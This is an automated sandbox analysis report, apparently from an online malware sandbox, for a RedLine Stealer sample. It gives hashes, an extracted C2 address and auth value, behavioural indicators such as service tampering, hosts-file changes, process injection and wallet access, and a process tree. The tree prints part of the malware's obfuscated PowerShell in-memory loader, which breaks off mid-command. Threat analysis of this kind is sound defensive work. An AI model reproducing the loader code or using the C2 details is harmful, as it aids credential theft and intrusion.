Analysis
-
max time kernel
155s -
max time network
158s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
16/01/2023, 13:38
Static task
static1
Behavioral task
behavioral1
Sample
77d29818be0d01c38545baa0bd4551c6853c224b.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
77d29818be0d01c38545baa0bd4551c6853c224b.exe
Resource
win10v2004-20220812-en
General
-
Target
77d29818be0d01c38545baa0bd4551c6853c224b.exe
-
Size
365KB
-
MD5
343adbd49e24d1bdec30f634f4055da8
-
SHA1
77d29818be0d01c38545baa0bd4551c6853c224b
-
SHA256
404c51dbba49787d8c3d9cde78efc1a5eb0d9f139c0c6b130438870a0ecc244c
-
SHA512
4c6831539aef807c7cb4875306e5fecc06b769924e0a1f80a5316f194a5235ec9e904c932b3ec4021e7ef2237bc2dba3db47a8a1cb20244c67c9fa1e6d88298f
-
SSDEEP
6144:SVjDF2Bp0G3LkjLsvBrL0+ecB4X0Y37cWI+HLq11aWBLXAO1DAjWbc:SRDF2BpjLQLsvBP0+ecyEY37C8P
Malware Config
Extracted
redline
1
107.182.129.73:21733
-
auth_value
3a5bb0917495b4312d052a0b8977d2bb
Signatures
-
Modifies security service 2 TTPs 5 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 1 IoCs
resource yara_rule behavioral2/memory/4280-167-0x00000000007D0000-0x00000000007F0000-memory.dmp family_redline -
Suspicious use of NtCreateProcessExOtherParentProcess 4 IoCs
description pid Process procid_target PID 4992 created 4248 4992 WerFault.exe 41 PID 3932 created 3232 3932 WerFault.exe 38 PID 260 created 3176 260 WerFault.exe 132 PID 3748 created 4008 3748 WerFault.exe 136 -
Suspicious use of NtCreateUserProcessOtherParentProcess 10 IoCs
description pid Process procid_target PID 2208 created 3044 2208 SmartDefRun.exe 40 PID 2208 created 3044 2208 SmartDefRun.exe 40 PID 2208 created 3044 2208 SmartDefRun.exe 40 PID 2208 created 3044 2208 SmartDefRun.exe 40 PID 364 created 596 364 powershell.EXE 5 PID 4944 created 3232 4944 svchost.exe 38 PID 4944 created 4248 4944 svchost.exe 41 PID 4944 created 3176 4944 svchost.exe 132 PID 4944 created 260 4944 svchost.exe 133 PID 4944 created 4008 4944 svchost.exe 136 -
Blocklisted process makes network request 1 IoCs
flow pid Process 40 1324 powershell.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\System32\drivers\etc\hosts SmartDefRun.exe -
Executes dropped EXE 5 IoCs
pid Process 1344 C4Loader.exe 1312 new2.exe 2188 SysApp.exe 2208 SmartDefRun.exe 4816 fodhelper.exe -
Stops running service(s) 3 TTPs
-
Uses the VBS compiler for execution 1 TTPs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Drops file in System32 directory 7 IoCs
description ioc Process File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.EXE.log powershell.EXE File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\System32\Tasks\Telemetry Logging svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 4100 set thread context of 1796 4100 77d29818be0d01c38545baa0bd4551c6853c224b.exe 79 PID 1312 set thread context of 4280 1312 new2.exe 96 PID 2208 set thread context of 4804 2208 SmartDefRun.exe 119 PID 364 set thread context of 3316 364 powershell.EXE 126 -
Drops file in Program Files directory 1 IoCs
description ioc Process File created C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe SmartDefRun.exe -
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 984 sc.exe 3312 sc.exe 2228 sc.exe 2952 sc.exe 1832 sc.exe -
Program crash 6 IoCs
pid pid_target Process procid_target 4808 4100 WerFault.exe 77 4856 1312 WerFault.exe 94 2996 3232 WerFault.exe 38 1264 4248 WerFault.exe 41 2088 3176 WerFault.exe 132 4912 4008 WerFault.exe 136 -
Checks processor information in registry 2 TTPs 12 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3568 schtasks.exe -
Enumerates system info in registry 2 TTPs 8 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1324 powershell.exe 1324 powershell.exe 2188 SysApp.exe 2188 SysApp.exe 2188 SysApp.exe 2188 SysApp.exe 2188 SysApp.exe 2188 SysApp.exe 2188 SysApp.exe 2188 SysApp.exe 2188 SysApp.exe 2188 SysApp.exe 2208 SmartDefRun.exe 2208 SmartDefRun.exe 2276 powershell.exe 2276 powershell.exe 4280 vbc.exe 2208 SmartDefRun.exe 2208 SmartDefRun.exe 2208 SmartDefRun.exe 2208 SmartDefRun.exe 4808 powershell.exe 4808 powershell.exe 2208 SmartDefRun.exe 2208 SmartDefRun.exe 364 powershell.EXE 364 powershell.EXE 3916 powershell.EXE 3916 powershell.EXE 364 powershell.EXE 3316 dllhost.exe 3316 dllhost.exe 3316 dllhost.exe 3316 dllhost.exe 3316 dllhost.exe 3316 dllhost.exe 3316 dllhost.exe 3316 dllhost.exe 3316 dllhost.exe 3316 dllhost.exe 3316 dllhost.exe 3316 dllhost.exe 3316 dllhost.exe 3316 dllhost.exe 3316 dllhost.exe 3316 dllhost.exe 3316 dllhost.exe 3316 dllhost.exe 3316 dllhost.exe 3316 dllhost.exe 3316 dllhost.exe 3316 dllhost.exe 3316 dllhost.exe 3316 dllhost.exe 3316 dllhost.exe 3316 dllhost.exe 3316 dllhost.exe 3316 dllhost.exe 3316 dllhost.exe 3316 dllhost.exe 3316 dllhost.exe 3316 dllhost.exe 3316 dllhost.exe 3316 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1324 powershell.exe Token: SeDebugPrivilege 2276 powershell.exe Token: SeDebugPrivilege 4280 vbc.exe Token: SeDebugPrivilege 4808 powershell.exe Token: SeIncreaseQuotaPrivilege 4808 powershell.exe Token: SeSecurityPrivilege 4808 powershell.exe Token: SeTakeOwnershipPrivilege 4808 powershell.exe Token: SeLoadDriverPrivilege 4808 powershell.exe Token: SeSystemProfilePrivilege 4808 powershell.exe Token: SeSystemtimePrivilege 4808 powershell.exe Token: SeProfSingleProcessPrivilege 4808 powershell.exe Token: SeIncBasePriorityPrivilege 4808 powershell.exe Token: SeCreatePagefilePrivilege 4808 powershell.exe Token: SeBackupPrivilege 4808 powershell.exe Token: SeRestorePrivilege 4808 powershell.exe Token: SeShutdownPrivilege 4808 powershell.exe Token: SeDebugPrivilege 4808 powershell.exe Token: SeSystemEnvironmentPrivilege 4808 powershell.exe Token: SeRemoteShutdownPrivilege 4808 powershell.exe Token: SeUndockPrivilege 4808 powershell.exe Token: SeManageVolumePrivilege 4808 powershell.exe Token: 33 4808 powershell.exe Token: 34 4808 powershell.exe Token: 35 4808 powershell.exe Token: 36 4808 powershell.exe Token: SeIncreaseQuotaPrivilege 4808 powershell.exe Token: SeSecurityPrivilege 4808 powershell.exe Token: SeTakeOwnershipPrivilege 4808 powershell.exe Token: SeLoadDriverPrivilege 4808 powershell.exe Token: SeSystemProfilePrivilege 4808 powershell.exe Token: SeSystemtimePrivilege 4808 powershell.exe Token: SeProfSingleProcessPrivilege 4808 powershell.exe Token: SeIncBasePriorityPrivilege 4808 powershell.exe Token: SeCreatePagefilePrivilege 4808 powershell.exe Token: SeBackupPrivilege 4808 powershell.exe Token: SeRestorePrivilege 4808 powershell.exe Token: SeShutdownPrivilege 4808 powershell.exe Token: SeDebugPrivilege 4808 powershell.exe Token: SeSystemEnvironmentPrivilege 4808 powershell.exe Token: SeRemoteShutdownPrivilege 4808 powershell.exe Token: SeUndockPrivilege 4808 powershell.exe Token: SeManageVolumePrivilege 4808 powershell.exe Token: 33 4808 powershell.exe Token: 34 4808 powershell.exe Token: 35 4808 powershell.exe Token: 36 4808 powershell.exe Token: SeIncreaseQuotaPrivilege 4808 powershell.exe Token: SeSecurityPrivilege 4808 powershell.exe Token: SeTakeOwnershipPrivilege 4808 powershell.exe Token: SeLoadDriverPrivilege 4808 powershell.exe Token: SeSystemProfilePrivilege 4808 powershell.exe Token: SeSystemtimePrivilege 4808 powershell.exe Token: SeProfSingleProcessPrivilege 4808 powershell.exe Token: SeIncBasePriorityPrivilege 4808 powershell.exe Token: SeCreatePagefilePrivilege 4808 powershell.exe Token: SeBackupPrivilege 4808 powershell.exe Token: SeRestorePrivilege 4808 powershell.exe Token: SeShutdownPrivilege 4808 powershell.exe Token: SeDebugPrivilege 4808 powershell.exe Token: SeSystemEnvironmentPrivilege 4808 powershell.exe Token: SeRemoteShutdownPrivilege 4808 powershell.exe Token: SeUndockPrivilege 4808 powershell.exe Token: SeManageVolumePrivilege 4808 powershell.exe Token: 33 4808 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4100 wrote to memory of 1796 4100 77d29818be0d01c38545baa0bd4551c6853c224b.exe 79 PID 4100 wrote to memory of 1796 4100 77d29818be0d01c38545baa0bd4551c6853c224b.exe 79 PID 4100 wrote to memory of 1796 4100 77d29818be0d01c38545baa0bd4551c6853c224b.exe 79 PID 4100 wrote to memory of 1796 4100 77d29818be0d01c38545baa0bd4551c6853c224b.exe 79 PID 4100 wrote to memory of 1796 4100 77d29818be0d01c38545baa0bd4551c6853c224b.exe 79 PID 1796 wrote to memory of 1324 1796 vbc.exe 83 PID 1796 wrote to memory of 1324 1796 vbc.exe 83 PID 1796 wrote to memory of 1324 1796 vbc.exe 83 PID 1324 wrote to memory of 1344 1324 powershell.exe 93 PID 1324 wrote to memory of 1344 1324 powershell.exe 93 PID 1324 wrote to memory of 1344 1324 powershell.exe 93 PID 1324 wrote to memory of 1312 1324 powershell.exe 94 PID 1324 wrote to memory of 1312 1324 powershell.exe 94 PID 1324 wrote to memory of 1312 1324 powershell.exe 94 PID 1312 wrote to memory of 4280 1312 new2.exe 96 PID 1312 wrote to memory of 4280 1312 new2.exe 96 PID 1312 wrote to memory of 4280 1312 new2.exe 96 PID 1312 wrote to memory of 4280 1312 new2.exe 96 PID 1312 wrote to memory of 4280 1312 new2.exe 96 PID 1324 wrote to memory of 2188 1324 powershell.exe 99 PID 1324 wrote to memory of 2188 1324 powershell.exe 99 PID 1324 wrote to memory of 2188 1324 powershell.exe 99 PID 1324 wrote to memory of 2208 1324 powershell.exe 100 PID 1324 wrote to memory of 2208 1324 powershell.exe 100 PID 5024 wrote to memory of 984 5024 cmd.exe 109 PID 5024 wrote to memory of 984 5024 cmd.exe 109 PID 5024 wrote to memory of 3312 5024 cmd.exe 110 PID 5024 wrote to memory of 3312 5024 cmd.exe 110 PID 5024 wrote to memory of 2228 5024 cmd.exe 111 PID 5024 wrote to memory of 2228 5024 cmd.exe 111 PID 5024 wrote to memory of 2952 5024 cmd.exe 112 PID 5024 wrote to memory of 2952 5024 cmd.exe 112 PID 5024 wrote to memory of 1832 5024 cmd.exe 113 PID 5024 wrote to memory of 1832 5024 cmd.exe 113 PID 5024 wrote to memory of 1020 5024 cmd.exe 114 PID 5024 wrote to memory of 1020 5024 cmd.exe 114 PID 5024 wrote to memory of 1592 5024 cmd.exe 115 PID 5024 wrote to memory of 1592 5024 cmd.exe 115 PID 5024 wrote to memory of 1444 5024 cmd.exe 116 PID 5024 wrote to memory of 1444 5024 cmd.exe 116 PID 5024 wrote to memory of 3508 5024 cmd.exe 117 PID 5024 wrote to memory of 3508 5024 cmd.exe 117 PID 5024 wrote to memory of 4748 5024 cmd.exe 118 PID 5024 wrote to memory of 4748 5024 cmd.exe 118 PID 2208 wrote to memory of 4804 2208 SmartDefRun.exe 119 PID 2188 wrote to memory of 3568 2188 SysApp.exe 124 PID 2188 wrote to memory of 3568 2188 SysApp.exe 124 PID 2188 wrote to memory of 3568 2188 SysApp.exe 124 PID 364 wrote to memory of 3316 364 powershell.EXE 126 PID 364 wrote to memory of 3316 364 powershell.EXE 126 PID 364 wrote to memory of 3316 364 powershell.EXE 126 PID 364 wrote to memory of 3316 364 powershell.EXE 126 PID 364 wrote to memory of 3316 364 powershell.EXE 126 PID 364 wrote to memory of 3316 364 powershell.EXE 126 PID 364 wrote to memory of 3316 364 powershell.EXE 126 PID 364 wrote to memory of 3316 364 powershell.EXE 126 PID 364 wrote to memory of 3316 364 powershell.EXE 126 PID 3316 wrote to memory of 596 3316 dllhost.exe 5 PID 3316 wrote to memory of 680 3316 dllhost.exe 4 PID 3316 wrote to memory of 952 3316 dllhost.exe 10 PID 3316 wrote to memory of 60 3316 dllhost.exe 11 PID 3316 wrote to memory of 440 3316 dllhost.exe 13 PID 3316 wrote to memory of 700 3316 dllhost.exe 15 PID 3316 wrote to memory of 1036 3316 dllhost.exe 17
Processes
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:680
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:596
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:60
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{b96c8909-50d6-4cea-b72b-ea14bdbe135b}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3316
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:952
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:440
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:700
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1036
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
PID:1124 -
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:2472
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:GJQLYgOGMbFF{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$cQqqaarctPAsWI,[Parameter(Position=1)][Type]$hFfuGqzUTV)$BGwLfQwRIDW=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+[Char](102)+''+[Char](108)+'e'+[Char](99)+'t'+[Char](101)+''+'d'+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+'e'+''+[Char](103)+''+[Char](97)+''+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+'M'+''+'e'+''+[Char](109)+''+'o'+''+'r'+''+'y'+''+[Char](77)+''+'o'+''+'d'+'u'+[Char](108)+''+'e'+'',$False).DefineType(''+[Char](77)+''+[Char](121)+'D'+[Char](101)+''+[Char](108)+''+[Char](101)+''+'g'+'a'+'t'+'e'+[Char](84)+''+'y'+''+'p'+''+'e'+'','C'+[Char](108)+''+[Char](97)+''+'s'+''+'s'+''+','+'P'+[Char](117)+''+'b'+''+'l'+'i'+[Char](99)+''+[Char](44)+''+[Char](83)+'e'+[Char](97)+''+[Char](108)+'e'+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+'s'+''+[Char](105)+''+[Char](67)+''+[Char](108)+''+[Char](97)+'s'+[Char](115)+''+','+''+[Char](65)+''+'u'+'toC'+[Char](108)+'a'+[Char](115)+''+'s'+'',[MulticastDelegate]);$BGwLfQwRIDW.DefineConstructor('R'+[Char](84)+'S'+[Char](112)+'e'+[Char](99)+''+'i'+''+[Char](97)+''+'l'+''+[Char](78)+''+'a'+'m'+[Char](101)+''+','+'H'+[Char](105)+''+[Char](100)+'e'+[Char](66)+''+'y'+''+[Char](83)+''+[Char](105)+''+'g'+','+'P'+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$cQqqaarctPAsWI).SetImplementationFlags(''+[Char](82)+''+'u'+'n'+[Char](116)+''+[Char](105)+''+[Char](109)+''+'e'+','+[Char](77)+''+[Char](97)+''+'n'+'a'+[Char](103)+''+'e'+'d');$BGwLfQwRIDW.DefineMethod(''+[Char](73)+''+[Char](110)+''+'v'+'o'+[Char](107)+''+'e'+'',''+'P'+'u'+[Char](98)+'li'+[Char](99)+''+[Char](44)+'H'+[Char](105)+''+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+'Si'+[Char](103)+''+','+''+[Char](78)+''+[Char](101)+'w'+[Char](83)+'l'+[Char](111)+''+[Char](116)+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+'r'+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$hFfuGqzUTV,$cQqqaarctPAsWI).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+'t'+[Char](105)+''+[Char](109)+'e'+','+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+'a'+''+'g'+''+[Char](101)+''+[Char](100)+'');Write-Output $BGwLfQwRIDW.CreateType();}$MEyvpdGEQvpuz=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'y'+[Char](115)+''+'t'+''+[Char](101)+''+[Char](109)+''+[Char](46)+'d'+[Char](108)+''+[Char](108)+'')}).GetType(''+'M'+'ic'+[Char](114)+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+''+'t'+''+'.'+'W'+[Char](105)+''+[Char](110)+''+[Char](51)+''+'2'+''+[Char](46)+''+'U'+''+[Char](110)+''+'s'+'a'+[Char](102)+''+[Char](101)+'M'+[Char](69)+''+'y'+''+'v'+''+[Char](112)+'d'+'G'+'E'+'Q'+''+[Char](118)+''+'p'+'uz');$dlwtQroHtDyLvJ=$MEyvpdGEQvpuz.GetMethod(''+'d'+''+'l'+''+[Char](119)+'t'+'Q'+''+[Char](114)+''+'o'+'H'+'t'+''+[Char](68)+''+[Char](121)+''+[Char](76)+''+'v'+''+'J'+'',[Reflection.BindingFlags]''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](83)+''+[Char](116)+''+[Char](97)+''+[Char](116)+'i'+'c'+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$jWmMooSqutLvbSCCpCO=GJQLYgOGMbFF @([String])([IntPtr]);$iFkBLwbNucYFIqDyBmOftv=GJQLYgOGMbFF 